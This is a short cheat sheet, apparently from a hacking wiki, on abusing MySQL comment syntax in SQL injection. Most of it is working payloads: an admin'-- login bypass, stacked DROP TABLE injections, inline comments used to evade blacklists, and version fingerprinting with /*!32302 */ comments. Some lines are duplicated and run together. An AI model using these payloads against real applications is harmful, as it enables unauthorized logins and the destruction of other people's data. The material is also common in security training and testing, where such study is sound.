Table of Contents
Hacking - SQL Injection - MySQL - Comments
Line Comments
Comments out rest of the query.
Line comments are generally useful for ignoring rest of the query so you don't have to deal with fixing the syntax.
DROP sampletable;-- DROP sampletable;#
Line Comments Sample SQL Injection Attacks
Username: admin'-- SELECT * FROM members WHERE username = 'admin'--' AND password = 'password' This IS going TO log you AS admin USER, because rest OF the SQL query will be ignored.
Inline Comments
Comment out rest of the query by not closing them or you can use for bypassing blacklisting, removing spaces, obfuscating and determining database versions.
/*Comment Here*/ DROP/*comment*/sampletable DR/**/OP/*bypass blacklisting*/sampletable SELECT/*avoid-spaces*/password/**/FROM/**/Members
Special Comment Syntax for MySQL
This is a special comment syntax for MySQL.
/*! MYSQL Special SQL */
It's perfect for detecting MySQL version. If you put a code into this comments it's going to execute in MySQL only. Also you can use this to execute some code only if the server is higher than supplied version.
SELECT /*!32302 1/0, */ 1 FROM tablename
Classical Inline Comment SQL Injection Attack Samples
ID: 10; DROP TABLE members /*
Simply get rid of other stuff at the end the of query. Same as:
10; DROP TABLE members --
Division by 0 error
SELECT /*!32302 1/0, */ 1 FROM tablename
Will throw a division by 0 error if MySQL version is higher than3.23.02
MySQL Version Detection Sample Attacks
ID: /*!32302 10*/ ID: 10
You will get the same response if MySQL version is higher than 3.23.02
SELECT /*!32302 1/0, */ 1 FROM tablename
Will throw a division by 0 error if MySQL version is higher than3.23.02